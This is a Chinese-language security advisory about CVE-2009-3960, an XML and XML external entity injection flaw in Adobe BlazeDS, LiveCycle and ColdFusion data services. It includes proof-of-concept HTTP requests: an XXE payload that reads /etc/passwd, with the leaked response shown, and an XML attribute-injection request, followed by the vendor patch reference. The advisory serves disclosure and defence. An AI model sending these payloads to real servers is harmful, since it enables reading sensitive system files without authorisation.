安全研究
安全漏洞
Adobe BlazeDS XML和XML外部实体注入漏洞
发布日期:2010-02-11
更新日期:2010-03-08
受影响系统:
Adobe LiveCycle 9.0描述:
Adobe LiveCycle 8.2.1
Adobe LiveCycle 8.0.1
Adobe ColdFusion 9.0
Adobe ColdFusion 8.0.1
Adobe ColdFusion 8
Adobe ColdFusion 7.0.2
Adobe BlazeDS 3.2
Adobe LiveCycle Data Services 3.0
Adobe LiveCycle Data Services 2.6.1
Adobe LiveCycle Data Services 2.5.1
Adobe Flex Data Services 2.0.1
BUGTRAQ ID: 38197
CVE ID: CVE-2009-3960
BlazeDS是Adobe的一个新的关于远程(Remoting)和网络信息系统(Web Messaging,类似于JMS)的开源项目。
Adobe Data Services组件用于为Flex/RIA应用提供数据消息传送、远程控制和管理等功能。mx.messaging.channels.HTTPChannel和mx.messaging.channels.SecureHTTPChannel等HTTPChannel servlet类没有正确地过滤AMFX请求中所声明和包含的XML实体,XML解析器解析恶意负载就可能导致XML和XML外部实体注入漏洞,用户可在返回的响应中读取本地文件等敏感信息。
<*来源:Roberto Suggi Liverani
链接:http://secunia.com/advisories/38543
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
http://www.adobe.com/support/security/bulletins/apsb10-05.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">
<body>
<object type="flex.messaging.messages.CommandMessage">
<traits>
<string>body</string><string>clientId</string><string>correlationId</string>
<string>destination</string><string>headers</string><string>messageId</string>
<string>operation</string><string>timestamp</string><string>timeToLive</string>
</traits><object><traits />
</object>
<null /><string /><string />
<object>
<traits>
<string>DSId</string><string>DSMessagingVersion</string>
</traits>
<string>nil</string><int>1</int>
</object>
<string>&x3;</string>
<int>5</int><int>0</int><int>0</int>
</object>
</body>
</amfx>
XML外部实体注入 – 响应
Response:
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">
<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>
<body targetURI="/onResult" responseURI="">
<object type="flex.messaging.messages.AcknowledgeMessage">
<traits><string>timestamp</string><string>headers</string>
<string>body</string><string>correlationId</string>
<string>messageId</string><string>timeToLive</string>
<string>clientId</string><string>destination</string>
</traits><double>1.257387140632E12</double><object>
<traits><string>DSMessagingVersion</string>
<string>DSId</string></traits><double>1.0</double>
<string>BDE929FE-270D-3B56-1061-616E8B938429</string>
</object><null/><string>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
[...]
XML注入 – 请求
POST /samples/messagebroker/http HTTP/1.1
Content-type: application/x-amf
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/>
</body></amfx>
XML注入 - 响应
AMF XML Response:
<?xml version="1.0" encoding="utf-8"?>
<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>
建议:
厂商补丁:
Adobe
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.adobe.com/support/security/bulletins/apsb10-05.html
浏览次数:3564
严重程度:0(网友投票)
绿盟科技给您安全的保障